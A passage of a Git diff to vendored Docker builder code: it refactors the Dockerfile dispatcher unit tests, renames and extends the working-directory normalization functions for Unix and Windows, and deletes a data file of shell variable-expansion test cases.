newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), previousResults) + secondSB := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), previousResults) + err := initializeStage(firstSB, firstFrom) + assert.NilError(t, err) + assert.Check(t, firstSB.state.hasFromImage()) + previousResults.indexed["base"] = firstSB.state.runConfig + previousResults.flat = append(previousResults.flat, firstSB.state.runConfig) + err = initializeStage(secondSB, secondFrom) + assert.NilError(t, err) + assert.Check(t, secondSB.state.hasFromImage()) } func TestOnbuild(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - err := onbuild(b, []string{"ADD", ".", "/app/src"}, nil, "ONBUILD ADD . /app/src") - - if err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - expectedOnbuild := "ADD . /app/src" - - if b.runConfig.OnBuild[0] != expectedOnbuild { - t.Fatalf("Wrong ONBUILD command. Expected: %s, got: %s", expectedOnbuild, b.runConfig.OnBuild[0]) - } + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.OnbuildCommand{ + Expression: "ADD . /app/src", + } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal("ADD . /app/src", sb.state.runConfig.OnBuild[0])) } func TestWorkdir(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} workingDir := "/app" - if runtime.GOOS == "windows" { - workingDir = "C:\app" - } - - err := workdir(b, []string{workingDir}, nil, "") - - if err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + workingDir = "C:\\app" } - - if b.runConfig.WorkingDir != workingDir { - t.Fatalf("WorkingDir should be set to %s, got %s", workingDir, b.runConfig.WorkingDir) + cmd := &instructions.WorkdirCommand{ + Path: workingDir, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(workingDir, sb.state.runConfig.WorkingDir)) } func TestCmd(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} command := "./executable" - err := cmd(b, []string{command}, nil, "") - - if err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + cmd := &instructions.CmdCommand{ + ShellDependantCmdLine: instructions.ShellDependantCmdLine{ + CmdLine: strslice.StrSlice{command}, + PrependShell: true, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) var expectedCommand strslice.StrSlice - if runtime.GOOS == "windows" { expectedCommand = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", command)) } else { expectedCommand = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", command)) } - if !compareStrSlice(b.runConfig.Cmd, expectedCommand) { - t.Fatalf("Command should be set to %s, got %s", command, b.runConfig.Cmd) - } - - if !b.cmdSet { - t.Fatalf("Command should be marked as set") - } -} - -func compareStrSlice(slice1, slice2 strslice.StrSlice) bool { - if len(slice1) != len(slice2) { - return false - } - - for i := range slice1 { - if slice1[i] != slice2[i] { - return false - } - } - - return true + assert.Check(t, is.DeepEqual(expectedCommand, sb.state.runConfig.Cmd)) + assert.Check(t, sb.state.cmdSet) } func TestHealthcheckNone(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - if err := healthcheck(b, []string{"NONE"}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.Healthcheck == nil { - t.Fatal("Healthcheck should be set, got nil") - } - - expectedTest := strslice.StrSlice(append([]string{"NONE"})) - - if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { - t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) - } + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.HealthCheckCommand{ + Health: &container.HealthConfig{ + Test: []string{"NONE"}, + }, + } + err := dispatch(sb, cmd) + assert.NilError(t, err) + + assert.Assert(t, sb.state.runConfig.Healthcheck != nil) + assert.Check(t, is.DeepEqual([]string{"NONE"}, sb.state.runConfig.Healthcheck.Test)) } func TestHealthcheckCmd(t *testing.T) { - b := &Builder{flags: &BFlags{flags: make(map[string]*Flag)}, runConfig: &container.Config{}, disableCommit: true} - - if err := healthcheck(b, []string{"CMD", "curl", "-f", "http://localhost/", "||", "exit", "1"}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - if b.runConfig.Healthcheck == nil { - t.Fatal("Healthcheck should be set, got nil") + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + expectedTest := []string{"CMD-SHELL", "curl -f http://localhost/ || exit 1"} + cmd := &instructions.HealthCheckCommand{ + Health: &container.HealthConfig{ + Test: expectedTest, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) - expectedTest := strslice.StrSlice(append([]string{"CMD-SHELL"}, "curl -f http://localhost/ || exit 1")) - - if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { - t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) - } + assert.Assert(t, sb.state.runConfig.Healthcheck != nil) + assert.Check(t, is.DeepEqual(expectedTest, sb.state.runConfig.Healthcheck.Test)) } func TestEntrypoint(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} entrypointCmd := "/usr/sbin/nginx" - if err := entrypoint(b, []string{entrypointCmd}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.Entrypoint == nil { - t.Fatalf("Entrypoint should be set") + cmd := &instructions.EntrypointCommand{ + ShellDependantCmdLine: instructions.ShellDependantCmdLine{ + CmdLine: strslice.StrSlice{entrypointCmd}, + PrependShell: true, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Assert(t, sb.state.runConfig.Entrypoint != nil) var expectedEntrypoint strslice.StrSlice - if runtime.GOOS == "windows" { expectedEntrypoint = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", entrypointCmd)) } else { expectedEntrypoint = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", entrypointCmd)) } - - if !compareStrSlice(expectedEntrypoint, b.runConfig.Entrypoint) { - t.Fatalf("Entrypoint command should be set to %s, got %s", expectedEntrypoint, b.runConfig.Entrypoint) - } + assert.Check(t, is.DeepEqual(expectedEntrypoint, sb.state.runConfig.Entrypoint)) } func TestExpose(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) exposedPort := "80" - - if err := expose(b, []string{exposedPort}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + cmd := &instructions.ExposeCommand{ + Ports: []string{exposedPort}, } + err := dispatch(sb, cmd) + assert.NilError(t, err) - if b.runConfig.ExposedPorts == nil { - t.Fatalf("ExposedPorts should be set") - } - - if len(b.runConfig.ExposedPorts) != 1 { - t.Fatalf("ExposedPorts should contain only 1 element. Got %s", b.runConfig.ExposedPorts) - } + assert.Assert(t, sb.state.runConfig.ExposedPorts != nil) + assert.Assert(t, is.Len(sb.state.runConfig.ExposedPorts, 1)) portsMapping, err := nat.ParsePortSpec(exposedPort) - - if err != nil { - t.Fatalf("Error when parsing port spec: %s", err.Error()) - } - - if _, ok := b.runConfig.ExposedPorts[portsMapping[0].Port]; !ok { - t.Fatalf("Port %s should be present. Got %s", exposedPort, b.runConfig.ExposedPorts) - } + assert.NilError(t, err) + assert.Check(t, is.Contains(sb.state.runConfig.ExposedPorts, portsMapping[0].Port)) } func TestUser(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) - userCommand := "foo" - - if err := user(b, []string{userCommand}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.User != userCommand { - t.Fatalf("User should be set to %s, got %s", userCommand, b.runConfig.User) + cmd := &instructions.UserCommand{ + User: "test", } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal("test", sb.state.runConfig.User)) } func TestVolume(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) exposedVolume := "/foo" - if err := volume(b, []string{exposedVolume}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - if b.runConfig.Volumes == nil { - t.Fatalf("Volumes should be set") - } - - if len(b.runConfig.Volumes) != 1 { - t.Fatalf("Volumes should contain only 1 element. Got %s", b.runConfig.Volumes) - } - - if _, ok := b.runConfig.Volumes[exposedVolume]; !ok { - t.Fatalf("Volume %s should be present. Got %s", exposedVolume, b.runConfig.Volumes) + cmd := &instructions.VolumeCommand{ + Volumes: []string{exposedVolume}, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Assert(t, sb.state.runConfig.Volumes != nil) + assert.Check(t, is.Len(sb.state.runConfig.Volumes, 1)) + assert.Check(t, is.Contains(sb.state.runConfig.Volumes, exposedVolume)) } func TestStopSignal(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - signal := "SIGKILL" - - if err := stopSignal(b, []string{signal}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + if runtime.GOOS == "windows" { + t.Skip("Windows does not support stopsignal") + return } + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} + signal := "SIGKILL" - if b.runConfig.StopSignal != signal { - t.Fatalf("StopSignal should be set to %s, got %s", signal, b.runConfig.StopSignal) + cmd := &instructions.StopSignalCommand{ + Signal: signal, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(signal, sb.state.runConfig.StopSignal)) } func TestArg(t *testing.T) { - buildOptions := &types.ImageBuildOptions{BuildArgs: make(map[string]*string)} - - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true, allowedBuildArgs: make(map[string]bool), options: buildOptions} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) argName := "foo" argVal := "bar" - argDef := fmt.Sprintf("%s=%s", argName, argVal) + cmd := &instructions.ArgCommand{Key: argName, Value: &argVal} + err := dispatch(sb, cmd) + assert.NilError(t, err) - if err := arg(b, []string{argDef}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - allowed, ok := b.allowedBuildArgs[argName] - - if !ok { - t.Fatalf("%s argument should be allowed as a build arg", argName) - } - - if !allowed { - t.Fatalf("%s argument was present in map but disallowed as a build arg", argName) - } - - val, ok := b.options.BuildArgs[argName] - - if !ok { - t.Fatalf("%s argument should be a build arg", argName) - } - - if *val != "bar" { - t.Fatalf("%s argument should have default value 'bar', got %s", argName, val) - } + expected := map[string]string{argName: argVal} + assert.Check(t, is.DeepEqual(expected, sb.state.buildArgs.GetAllAllowed())) } func TestShell(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) shellCmd := "powershell" + cmd := &instructions.ShellCommand{Shell: strslice.StrSlice{shellCmd}} - attrs := make(map[string]bool) - attrs["json"] = true + err := dispatch(sb, cmd) + assert.NilError(t, err) - if err := shell(b, []string{shellCmd}, attrs, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } + expectedShell := strslice.StrSlice([]string{shellCmd}) + assert.Check(t, is.DeepEqual(expectedShell, sb.state.runConfig.Shell)) +} - if b.runConfig.Shell == nil { - t.Fatalf("Shell should be set") - } +func TestPrependEnvOnCmd(t *testing.T) { + buildArgs := NewBuildArgs(nil) + buildArgs.AddArg("NO_PROXY", nil) - expectedShell := strslice.StrSlice([]string{shellCmd}) + args := []string{"sorted=nope", "args=not", "http_proxy=foo", "NO_PROXY=YA"} + cmd := []string{"foo", "bar"} + cmdWithEnv := prependEnvOnCmd(buildArgs, args, cmd) + expected := strslice.StrSlice([]string{ + "|3", "NO_PROXY=YA", "args=not", "sorted=nope", "foo", "bar"}) + assert.Check(t, is.DeepEqual(expected, cmdWithEnv)) +} - if !compareStrSlice(expectedShell, b.runConfig.Shell) { - t.Fatalf("Shell should be set to %s, got %s", expectedShell, b.runConfig.Shell) - } +func TestRunWithBuildArgs(t *testing.T) { + b := newBuilderWithMockBackend() + args := NewBuildArgs(make(map[string]*string)) + args.argsFromOptions["HTTP_PROXY"] = strPtr("FOO") + b.disableCommit = false + sb := newDispatchRequest(b, '`', nil, args, newStagesBuildResults()) + + runConfig := &container.Config{} + origCmd := strslice.StrSlice([]string{"cmd", "in", "from", "image"}) + cmdWithShell := strslice.StrSlice(append(getShell(runConfig, runtime.GOOS), "echo foo")) + envVars := []string{"|1", "one=two"} + cachedCmd := strslice.StrSlice(append(envVars, cmdWithShell...)) + + imageCache := &mockImageCache{ + getCacheFunc: func(parentID string, cfg *container.Config) (string, error) { + // Check the runConfig.Cmd sent to probeCache() + assert.Check(t, is.DeepEqual(cachedCmd, cfg.Cmd)) + assert.Check(t, is.DeepEqual(strslice.StrSlice(nil), cfg.Entrypoint)) + return "", nil + }, + } + + mockBackend := b.docker.(*MockBackend) + mockBackend.makeImageCacheFunc = func(_ []string) builder.ImageCache { + return imageCache + } + b.imageProber = newImageProber(mockBackend, nil, false) + mockBackend.getImageFunc = func(_ string) (builder.Image, builder.ROLayer, error) { + return &mockImage{ + id: "abcdef", + config: &container.Config{Cmd: origCmd}, + }, nil, nil + } + mockBackend.containerCreateFunc = func(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) { + // Check the runConfig.Cmd sent to create() + assert.Check(t, is.DeepEqual(cmdWithShell, config.Config.Cmd)) + assert.Check(t, is.Contains(config.Config.Env, "one=two")) + assert.Check(t, is.DeepEqual(strslice.StrSlice{""}, config.Config.Entrypoint)) + return container.ContainerCreateCreatedBody{ID: "12345"}, nil + } + mockBackend.commitFunc = func(cfg backend.CommitConfig) (image.ID, error) { + // Check the runConfig.Cmd sent to commit() + assert.Check(t, is.DeepEqual(origCmd, cfg.Config.Cmd)) + assert.Check(t, is.DeepEqual(cachedCmd, cfg.ContainerConfig.Cmd)) + assert.Check(t, is.DeepEqual(strslice.StrSlice(nil), cfg.Config.Entrypoint)) + return "", nil + } + from := &instructions.Stage{BaseName: "abcdef"} + err := initializeStage(sb, from) + assert.NilError(t, err) + sb.state.buildArgs.AddArg("one", strPtr("two")) + run := &instructions.RunCommand{ + ShellDependantCmdLine: instructions.ShellDependantCmdLine{ + CmdLine: strslice.StrSlice{"echo foo"}, + PrependShell: true, + }, + } + assert.NilError(t, dispatch(sb, run)) + + // Check that runConfig.Cmd has not been modified by run + assert.Check(t, is.DeepEqual(origCmd, sb.state.runConfig.Cmd)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go index 8b0dfc3911..b3ba380323 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go @@ -1,18 +1,18 @@ // +build !windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "fmt" + "errors" "os" "path/filepath" ) -// normaliseWorkdir normalises a user requested working directory in a -// platform sematically consistent way. -func normaliseWorkdir(current string, requested string) (string, error) { +// normalizeWorkdir normalizes a user requested working directory in a +// platform semantically consistent way. +func normalizeWorkdir(_ string, current string, requested string) (string, error) { if requested == "" { - return "", fmt.Errorf("cannot normalise nothing") + return "", errors.New("cannot normalize nothing") } current = filepath.FromSlash(current) requested = filepath.FromSlash(requested) @@ -21,7 +21,3 @@ func normaliseWorkdir(current string, requested string) (string, error) { } return requested, nil } - -func errNotJSON(command, _ string) error { - return fmt.Errorf("%s requires the arguments to be in JSON form", command) -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go index 4aae6b460e..c2aebfbb27 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go @@ -1,14 +1,15 @@ // +build !windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( + "runtime" "testing" ) -func TestNormaliseWorkdir(t *testing.T) { +func TestNormalizeWorkdir(t *testing.T) { testCases := []struct{ current, requested, expected, expectedError string }{ - {``, ``, ``, `cannot normalise nothing`}, + {``, ``, ``, `cannot normalize nothing`}, {``, `foo`, `/foo`, ``}, {``, `/foo`, `/foo`, ``}, {`/foo`, `bar`, `/foo/bar`, ``}, @@ -16,18 +17,18 @@ func TestNormaliseWorkdir(t *testing.T) { } for _, test := range testCases { - normalised, err := normaliseWorkdir(test.current, test.requested) + normalized, err := normalizeWorkdir(runtime.GOOS, test.current, test.requested) if test.expectedError != "" && err == nil { - t.Fatalf("NormaliseWorkdir should return an error %s, got nil", test.expectedError) + t.Fatalf("NormalizeWorkdir should return an error %s, got nil", test.expectedError) } if test.expectedError != "" && err.Error() != test.expectedError { - t.Fatalf("NormaliseWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error()) + t.Fatalf("NormalizeWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error()) } - if normalised != test.expected { - t.Fatalf("NormaliseWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalised) + if normalized != test.expected { + t.Fatalf("NormalizeWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalized) } } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go index e890c3ae18..7824d1169b 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go @@ -1,8 +1,10 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( + "errors" "fmt" "os" + "path" "path/filepath" "regexp" "strings" @@ -12,11 +14,37 @@ import ( var pattern = regexp.MustCompile(`^[a-zA-Z]:\.$`) -// normaliseWorkdir normalises a user requested working directory in a -// platform sematically consistent way. -func normaliseWorkdir(current string, requested string) (string, error) { +// normalizeWorkdir normalizes a user requested working directory in a +// platform semantically consistent way. +func normalizeWorkdir(platform string, current string, requested string) (string, error) { + if platform == "" { + platform = "windows" + } + if platform == "windows" { + return normalizeWorkdirWindows(current, requested) + } + return normalizeWorkdirUnix(current, requested) +} + +// normalizeWorkdirUnix normalizes a user requested working directory in a +// platform semantically consistent way. +func normalizeWorkdirUnix(current string, requested string) (string, error) { + if requested == "" { + return "", errors.New("cannot normalize nothing") + } + current = strings.Replace(current, string(os.PathSeparator), "/", -1) + requested = strings.Replace(requested, string(os.PathSeparator), "/", -1) + if !path.IsAbs(requested) { + return path.Join(`/`, current, requested), nil + } + return requested, nil +} + +// normalizeWorkdirWindows normalizes a user requested working directory in a +// platform semantically consistent way. +func normalizeWorkdirWindows(current string, requested string) (string, error) { if requested == "" { - return "", fmt.Errorf("cannot normalise nothing") + return "", errors.New("cannot normalize nothing") } // `filepath.Clean` will replace "" with "." so skip in that case @@ -65,22 +93,3 @@ func normaliseWorkdir(current string, requested string) (string, error) { // Upper-case drive letter return (strings.ToUpper(string(requested[0])) + requested[1:]), nil } - -func errNotJSON(command, original string) error { - // For Windows users, give a hint if it looks like it might contain - // a path which hasn't been escaped such as ["c:\windows\system32\prog.exe", "-param"], - // as JSON must be escaped. Unfortunate... - // - // Specifically looking for quote-driveletter-colon-backslash, there's no - // double backslash and a [] pair. No, this is not perfect, but it doesn't - // have to be. It's simply a hint to make life a little easier. - extra := "" - original = filepath.FromSlash(strings.ToLower(strings.Replace(strings.ToLower(original), strings.ToLower(command)+" ", "", -1))) - if len(regexp.MustCompile(`"[a-z]:\\.*`).FindStringSubmatch(original)) > 0 && - !strings.Contains(original, `\\`) && - strings.Contains(original, "[") && - strings.Contains(original, "]") { - extra = fmt.Sprintf(`. It looks like '%s' includes a file path without an escaped back-slash. JSON requires back-slashes to be escaped such as ["c:\\path\\to\\file.exe", "/parameter"]`, original) - } - return fmt.Errorf("%s requires the arguments to be in JSON form%s", command, extra) -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go index 3319c06582..ae72092c4f 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go @@ -1,40 +1,46 @@ // +build windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import "testing" -func TestNormaliseWorkdir(t *testing.T) { - tests := []struct{ current, requested, expected, etext string }{ - {``, ``, ``, `cannot normalise nothing`}, - {``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {`c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {`c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {``, `a`, `C:\a`, ``}, - {``, `c:\foo`, `C:\foo`, ``}, - {``, `c:\\foo`, `C:\foo`, ``}, - {``, `\foo`, `C:\foo`, ``}, - {``, `\\foo`, `C:\foo`, ``}, - {``, `/foo`, `C:\foo`, ``}, - {``, `C:/foo`, `C:\foo`, ``}, - {`C:\foo`, `bar`, `C:\foo\bar`, ``}, - {`C:\foo`, `/bar`, `C:\bar`, ``}, - {`C:\foo`, `\bar`, `C:\bar`, ``}, +func TestNormalizeWorkdir(t *testing.T) { + tests := []struct{ platform, current, requested, expected, etext string }{ + {"windows", ``, ``, ``, `cannot normalize nothing`}, + {"windows", ``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", ``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", `c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", `c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", ``, `a`, `C:\a`, ``}, + {"windows", ``, `c:\foo`, `C:\foo`, ``}, + {"windows", ``, `c:\\foo`, `C:\foo`, ``}, + {"windows", ``, `\foo`, `C:\foo`, ``}, + {"windows", ``, `\\foo`, `C:\foo`, ``}, + {"windows", ``, `/foo`, `C:\foo`, ``}, + {"windows", ``, `C:/foo`, `C:\foo`, ``}, + {"windows", `C:\foo`, `bar`, `C:\foo\bar`, ``}, + {"windows", `C:\foo`, `/bar`, `C:\bar`, ``}, + {"windows", `C:\foo`, `\bar`, `C:\bar`, ``}, + {"linux", ``, ``, ``, `cannot normalize nothing`}, + {"linux", ``, `foo`, `/foo`, ``}, + {"linux", ``, `/foo`, `/foo`, ``}, + {"linux", `/foo`, `bar`, `/foo/bar`, ``}, + {"linux", `/foo`, `/bar`, `/bar`, ``}, + {"linux", `\a`, `b\c`, `/a/b/c`, ``}, } for _, i := range tests { - r, e := normaliseWorkdir(i.current, i.requested) + r, e := normalizeWorkdir(i.platform, i.current, i.requested) if i.etext != "" && e == nil { - t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested) + t.Fatalf("TestNormalizeWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested) } if i.etext != "" && e.Error() != i.etext { - t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error()) + t.Fatalf("TestNormalizeWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error()) } if r != i.expected { - t.Fatalf("TestNormaliseWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r) + t.Fatalf("TestNormalizeWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r) } } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest deleted file mode 100644 index 067dca9a54..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest +++ /dev/null @@ -1,116 +0,0 @@ -A|hello | hello -A|he'll'o | hello -A|he'llo | hello -A|he\'llo | he'llo -A|he\\'llo | he\llo -A|abc\tdef | abctdef -A|"abc\tdef" | abc\tdef -A|'abc\tdef' | abc\tdef -A|hello\ | hello -A|hello\\ | hello\ -A|"hello | hello -A|"hello\" | hello" -A|"hel'lo" | hel'lo -A|'hello | hello -A|'hello\' | hello\ -A|"''" | '' -A|$. | $. -A|$1 | -A|he$1x | hex -A|he$.x | he$.x -# Next one is different on Windows as $pwd==$PWD -U|he$pwd. | he. -W|he$pwd. | he/home. -A|he$PWD | he/home -A|he\$PWD | he$PWD -A|he\\$PWD | he\/home -A|he\${} | he${} -A|he\${}xx | he${}xx -A|he${} | he -A|he${}xx | hexx -A|he${hi} | he -A|he${hi}xx | hexx -A|he${PWD} | he/home -A|he${.} | error -A|he${XXX:-000}xx | he000xx -A|he${PWD:-000}xx | he/homexx -A|he${XXX:-$PWD}xx | he/homexx -A|he${XXX:-${PWD:-yyy}}xx | he/homexx -A|he${XXX:-${YYY:-yyy}}xx | heyyyxx -A|he${XXX:YYY} | error -A|he${XXX:+${PWD}}xx | hexx -A|he${PWD:+${XXX}}xx | hexx -A|he${PWD:+${SHELL}}xx | hebashxx -A|he${XXX:+000}xx | hexx -A|he${PWD:+000}xx | he000xx -A|'he${XX}' | he${XX} -A|"he${PWD}" | he/home -A|"he'$PWD'" | he'/home' -A|"$PWD" | /home -A|'$PWD' | $PWD -A|'\$PWD' | \$PWD -A|'"hello"' | "hello" -A|he\$PWD | he$PWD -A|"he\$PWD" | he$PWD -A|'he\$PWD' | he\$PWD -A|he${PWD | error -A|he${PWD:=000}xx | error -A|he${PWD:+${PWD}:}xx | he/home:xx -A|he${XXX:-\$PWD:}xx | he$PWD:xx -A|he${XXX:-\${PWD}z}xx | he${PWDz}xx -A|안녕하세요 | 안녕하세요 -A|안'녕'하세요 | 안녕하세요 -A|안'녕하세요 | 안녕하세요 -A|안녕\'하세요 | 안녕'하세요 -A|안\\'녕하세요 | 안\녕하세요 -A|안녕\t하세요 | 안녕t하세요 -A|"안녕\t하세요" | 안녕\t하세요 -A|'안녕\t하세요 | 안녕\t하세요 -A|안녕하세요\ | 안녕하세요 -A|안녕하세요\\ | 안녕하세요\ -A|"안녕하세요 | 안녕하세요 -A|"안녕하세요\" | 안녕하세요" -A|"안녕'하세요" | 안녕'하세요 -A|'안녕하세요 | 안녕하세요 -A|'안녕하세요\' | 안녕하세요\ -A|안녕$1x | 안녕x -A|안녕$.x | 안녕$.x -# Next one is different on Windows as $pwd==$PWD -U|안녕$pwd. | 안녕. -W|안녕$pwd. | 안녕/home. -A|안녕$PWD | 안녕/home -A|안녕\$PWD | 안녕$PWD -A|안녕\\$PWD | 안녕\/home -A|안녕\${} | 안녕${} -A|안녕\${}xx | 안녕${}xx -A|안녕${} | 안녕 -A|안녕${}xx | 안녕xx -A|안녕${hi} | 안녕 -A|안녕${hi}xx | 안녕xx -A|안녕${PWD} | 안녕/home -A|안녕${.} | error -A|안녕${XXX:-000}xx | 안녕000xx -A|안녕${PWD:-000}xx | 안녕/homexx -A|안녕${XXX:-$PWD}xx | 안녕/homexx -A|안녕${XXX:-${PWD:-yyy}}xx | 안녕/homexx -A|안녕${XXX:-${YYY:-yyy}}xx | 안녕yyyxx -A|안녕${XXX:YYY} | error -A|안녕${XXX:+${PWD}}xx | 안녕xx -A|안녕${PWD:+${XXX}}xx | 안녕xx -A|안녕${PWD:+${SHELL}}xx | 안녕bashxx -A|안녕${XXX:+000}xx | 안녕xx -A|안녕${PWD:+000}xx | 안녕000xx -A|'안녕${XX}' | 안녕${XX} -A|"안녕${PWD}" | 안녕/home -A|"안녕'$PWD'" | 안녕'/home' -A|'"안녕"' | "안녕" -A|안녕\$PWD | 안녕$PWD -A|"안녕\$PWD" | 안녕$PWD -A|'안녕\$PWD' | 안녕\$PWD -A|안녕${PWD | error -A|안녕${PWD:=000}xx | error 